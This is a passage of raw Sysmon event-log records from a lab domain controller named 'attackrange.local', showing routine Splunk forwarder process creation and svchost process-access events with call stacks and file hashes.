EM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.612{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.658{59A5CD1D-92E9-6005-C304-00000000A301}48321420C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.518{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 